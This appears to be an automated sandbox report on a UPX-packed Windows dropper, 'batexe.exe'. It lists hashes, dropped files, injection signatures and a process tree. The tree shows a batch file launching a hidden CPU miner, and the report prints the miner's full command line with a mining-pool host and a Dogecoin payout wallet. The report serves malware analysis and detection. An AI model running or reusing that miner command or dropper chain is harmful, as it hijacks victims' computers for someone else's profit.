73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
304s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
19/02/2024, 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4952	b2e.exe
2296	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe
2296	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4192-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4192 wrote to memory of 4952	4192	batexe.exe	74
PID 4192 wrote to memory of 4952	4192	batexe.exe	74
PID 4192 wrote to memory of 4952	4192	batexe.exe	74
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4952 wrote to memory of 4968	4952	b2e.exe	75
PID 4968 wrote to memory of 2296	4968	cmd.exe	78
PID 4968 wrote to memory of 2296	4968	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Users\Admin\AppData\Local\Temp\2323.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2323.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2323.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28FF.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2323.tmp\b2e.exe

Filesize
3.1MB

MD5
fbac36eb5c253e94dc65c2db4ce5eb9c

SHA1
56deeeb370231812e70780b1fcf57151b7277866

SHA256
80b03450421f894ac56e1e40d5462d25ad5dd480d279fbd28ba456fdc688f4a9

SHA512
9dc70ca11140ddd3bbc41e877d480c1e1382e4d9d05eab6e4c609638d6ff8d4af52e5cd173eee2da268a359dc5be406705e48eb56761aaa93f326e712182bea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\2323.tmp\b2e.exe

Filesize
3.2MB

MD5
40889b384a48274d43cff4f5fc6ca21a

SHA1
62bdcdf62b98f9ccaf9f1cc3eaeeb448aa4894e1

SHA256
07f7d84ed5ce94bcb07bcbccc66909550b27f4fc5e8cca3b348bd9b5b172d106

SHA512
bd5ec17399dcf9b857c36e95d01e216b3b0130402d086697c83519f32464e053a9a7d63d3575787059e61e367ce5863161c201b5856d079fc6e6ce83f8b98897

Download Submit
C:\Users\Admin\AppData\Local\Temp\28FF.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
952KB

MD5
fe5aeb574008f2503816a582c6209001

SHA1
9b6651793f69f6e4d38ea6215db2d56e1bc3961c

SHA256
950b3e0062cf57485473f143c4690bac0663f3c5c7585705fa2ac026bce6e0a4

SHA512
653db004c71550fa294f2726ae7105612e1a670dbc8105689556f79b1358fca6d1adbb8d81e848362ca1f31928f6a5d57e9b03e76c3e32d95ae1d54d1cd7f082

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
664KB

MD5
d1ca9e18f232552785e3d4c5d5c3dd13

SHA1
4eefeceead4596f2310cd3cfbcd089492d61e46e

SHA256
e7759ecafb6962a2244538921727b386d1fa4156963d96f01c002f6cb447522b

SHA512
5ba022d1299c8449f2543405e2dc9fb51f0f102337604339c4921b8538d67ae724a06a609f5f360729b1c1f6e21528bfc4a1f106ec1c3c9d3447fae801715b40

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
814KB

MD5
ae26532cfe3bd53623deec87191315f9

SHA1
14cdf0ed4f578c5b7cb5ad37c94adb5c9762d63e

SHA256
3a2688e25eeb1a22ab3d55f7b98b0e45876b9599113bfedc96f8b957adda7203

SHA512
4d57f0fd2a32297a81cbe80cff3452d3652af7d6c0fd830f71784eaf7bfbb4d93a5dd9ebb5241daae89a2b215b7f2cb41687923d5beca4f067b54eaae3bd102e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
828KB

MD5
f1db4c4f08c71277fdd71b2e0e579e04

SHA1
b4ce77ff963b63815976689c8cf13b50fa317aa3

SHA256
45646786c09f4144d44c45d71b5028b247d6b4dfdca50a78fd4fa9b7791d7e35

SHA512
f300dc00d1f1ed23127765dc2b0008480d66037ffecbc3e4a7cf8135dbc4561544fd6781383b09dba6ed808421cb25a76de077d17cd2e4586053fcb194364a78

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
151KB

MD5
ca8ae26361a25987df9c3cdbced3ac15

SHA1
f53d3cc1f2465e36231f5b1b659b7b30a02dc41e

SHA256
806be185e413251841c4b17e6f9481f92a9c4f8a1e5a920aeb93986c51fc95b0

SHA512
a54d3ec3f9a6d65d68e14a6295a86be761c4acefc20b532d928591f0d9ce31dd01e263c0367e2f3f1ae6820e0f86ab38373f49c3da66eebc9c4dcaf3f525c9b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
548KB

MD5
2497509936c97f2db1e23cb63df9952b

SHA1
f97c7ba2273a061442c6f1e8a66e4715655bcc70

SHA256
d9726317e84f49d4277e8baca48b42e3fc996d958fc462817e0ddf33f99889ad

SHA512
f989f0b10bcd98bdc8491b5875aee7cb7d4a9804ce52bc213e494c211986fd34a85f99e48380ccba0613fc5edbf1cb784c567fb1a17356bb2431010d12b59c54

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
603KB

MD5
37451265417858e361033771d2ce522b

SHA1
328886fc42d491b7b0a77dece1504a3db5522523

SHA256
899066f61c8cafbbea3f512593dc9c7888cedae825d0a19ae4cbdda4c414a11d

SHA512
697032aa39baceffc4609ff8710c18e066404fd394d470f8b07b62d87e927411da59bbc9b12db683dee57b03b4afdd8bafcd63dab29c63c81e1e5489672abf6f

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
486KB

MD5
79580aae73a59e0558d04d077b0c1cb5

SHA1
dcc1c1badb95588c9565f408bbbe9c83b501f3a5

SHA256
7dd9156110e83e7000ddabe0b27be96e351fcc37db1b971a90342efc4e728e84

SHA512
2037685e4bbd750e7b8c1ebe9e2793482bde9b411a68c0355a7b8b572231eb5581593a33c78b7d28dba677265053f7b2f648a797be0995fabbe68443e6565657

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
468KB

MD5
c76812c397c849b7b54fd26fce503c89

SHA1
9d5cbb5a208bfc4ca303f0dfd697c9f2a566fd0d

SHA256
08bebce48cf2734e8bebbb280e38a7db7cbfb3a685c43e9e20c77091809173aa

SHA512
f09c83c76805ffc66757014e9b4879bcc92cbf57d46007019abb9c38f80fb0eb8bfdf4ce74b3505924d8bc975c266cf1c03397f96b196c77689089bfe2c11869

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
320KB

MD5
e748e3357af6e4674ff8962691273b0d

SHA1
0acfc30d68a1ef7c6790a79270864448f70f0aa8

SHA256
84ff770c784909548dbca7bd2a24c8e82338b142f2d4893023e25c52f70e8d14

SHA512
0bd15154698983c85b46810d8fef9092f4d0725882421d6db61f168873af967808c467b924dcb8ee72aaad6e10202edab14916580fc442e14b9d8c85f9d07dcc

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2296-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2296-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2296-42-0x0000000050AE0000-0x0000000050B78000-memory.dmp

Filesize
608KB

Download
memory/2296-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2296-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2296-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4192-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4952-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4952-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download